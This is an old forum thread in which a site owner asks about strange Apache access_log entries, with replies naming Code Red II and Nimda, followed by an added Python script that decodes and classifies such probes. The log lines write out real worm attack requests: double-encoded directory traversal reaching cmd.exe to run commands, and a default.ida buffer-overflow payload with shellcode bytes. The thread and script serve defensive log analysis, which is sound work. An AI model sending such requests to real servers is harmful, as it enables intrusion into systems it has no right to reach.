more access_log garbage...


BigCletus
02-05-2003, 02:02 AM
Ok, I am used to getting the Nimda crap constantly in my access_log, but now I am getting this too:


12.230.20.57 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
12.230.20.57 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
62.46.213.7 - - [14/Oct/2002:08:25:10 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-"
12.230.129.255 - - [14/Oct/2002:10:31:33 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
12.230.129.255 - - [14/Oct/2002:1



What are all of those NNN's? This same line repeats over and over in my log file. Is this another virus?

Gaston
02-05-2003, 07:10 AM
Looks like someone's checking your server if you're running Apache on Windows. Check out the directories in the paths.

nuisance
02-05-2003, 07:43 AM
Attempts to reach default.ida are probably the Code Red II worm. If you ever see attempts to run .exe files it's probably Nimda.
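
An added example, not part of the thread: a small Python triage script that percent-decodes each request target repeatedly (so `%25%35%63` and `%252f` resolve to `\` and `/`), labels the probe types discussed above, and lists any probe that was not answered with a 4xx. The function names, labels and sample lines are assumptions constructed for illustration; the worm attributions in the comments are the ones given in the replies.

```python
import re
from urllib.parse import unquote

# Common/combined log format: host ident user [time] "METHOD target ..." status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so double-encoded bytes (%252f, %25%35%63) surface."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return (client, status, label) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    path = fully_decode(target).replace("\\", "/").lower()
    if path.startswith("/default.ida?"):    # thread: probably Code Red II
        return client, int(status), "default.ida probe"
    if re.search(r"\.exe(\?|$)", path):     # thread: probably Nimda
        return client, int(status), ("exe probe via traversal" if "../" in path else "exe probe")
    return client, int(status), "other"

def summarize(lines):
    """Count probes per (client, label); list probes that did not get a 4xx."""
    counts, answered = {}, []
    for line in lines:
        hit = classify(line)
        if hit is None or hit[2] == "other":
            continue
        client, status, label = hit
        counts[(client, label)] = counts.get((client, label), 0) + 1
        if not 400 <= status < 500:
            answered.append((client, label, status))
    return counts, answered

# Constructed sample lines modelled on the post (documentation addresses, padding shortened).
SAMPLE = [
    '192.0.2.1 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"',
    '192.0.2.1 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"',
    '192.0.2.2 - - [14/Oct/2002:08:25:10 -0700] "GET /default.ida?NNNNNNNN%u9090%u6858=a HTTP/1.0" 400 323 "-" "-"',
    '192.0.2.3 - - [14/Oct/2002:10:31:33 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"',
    '192.0.2.4 - - [14/Oct/2002:10:40:00 -0700] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```

Calling `summarize(SAMPLE)` returns the per-client probe counts and an empty second list, since every sample probe received a 4xx; a probe answered with any other status is the one worth investigating.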